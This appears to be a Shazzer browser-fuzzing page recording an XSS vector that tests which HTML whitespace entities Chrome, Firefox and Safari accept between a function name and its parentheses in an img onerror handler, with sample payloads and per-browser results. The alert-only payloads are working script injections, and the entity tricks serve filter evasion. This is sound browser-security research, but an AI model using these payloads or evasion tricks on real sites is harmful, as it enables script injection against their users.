Entities allowed between function calls
8
4
2This vector uses Shazzer's new features to check which entities are allowed between a function call using images. The results are a bit inconsistent yet because I currently wait for page load.
Created by: hackvertor
Created on: Saturday, June 29, 2024 at 1:55:26 PM
Updated on: Wednesday, September 11, 2024 at 7:50:38 PM
Vector type: XSS
Template used:
<img src=data: onerror="log$[data1]('html($[data1])')">Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...
Sample payloads
<img src=data: onerror="alert ('&ThinSpace;')"><img src=data: onerror="alert ('&puncsp;')"><img src=data: onerror="alert ('&MediumSpace;')"><img src=data: onerror="alert ('&thinsp;')"><img src=data: onerror="alert ('&hairsp;')"><img src=data: onerror="alert ('&emsp;')"><img src=data: onerror="alert ('&NonBreakingSpace;')"><img src=data: onerror="alert
('&NewLine;')"><img src=data: onerror="alert ('&emsp13;')"><img src=data: onerror="alert ('&emsp14;')"><img src=data: onerror="alert ('&ensp;')"><img src=data: onerror="alert	('&Tab;')"><img src=data: onerror="alert ('&nbsp;')"><img src=data: onerror="alert ('&numsp;')"><img src=data: onerror="alert ('&VeryThinSpace;')">Fuzz results
Chrome 126.0.0.0 desktop macOS 10.15.7
Updated
Sat Jun 29 2024
Found 8 results
| Data |
|---|
|   |
| Data |
|---|
|   |
| Data |
|---|
|   |
| Data |
|---|
| 
 |
| Data |
|---|
|   |
| Data |
|---|
|   |
| Data |
|---|
|   |
| Data |
|---|
|   |
Firefox 127.0 desktop macOS 10.15
Updated
Sat Jun 29 2024
Found 4 results
| Data |
|---|
|   |
| Data |
|---|
|   |
| Data |
|---|
|   |
| Data |
|---|
|   |
Safari 17.4 desktop macOS 10.15.7
Updated
Sat Jun 29 2024
Found 2 results
| Data |
|---|
|   |
| Data |
|---|
| 	 |
Safari 17.5 mobile iOS 17.5.1
Updated
Sun Jun 30 2024
Found 6 results
| Data |
|---|
|   |
| Data |
|---|
|   |
| Data |
|---|
| |
| Data |
|---|
|   |
| Data |
|---|
| 	 |
| Data |
|---|
|   |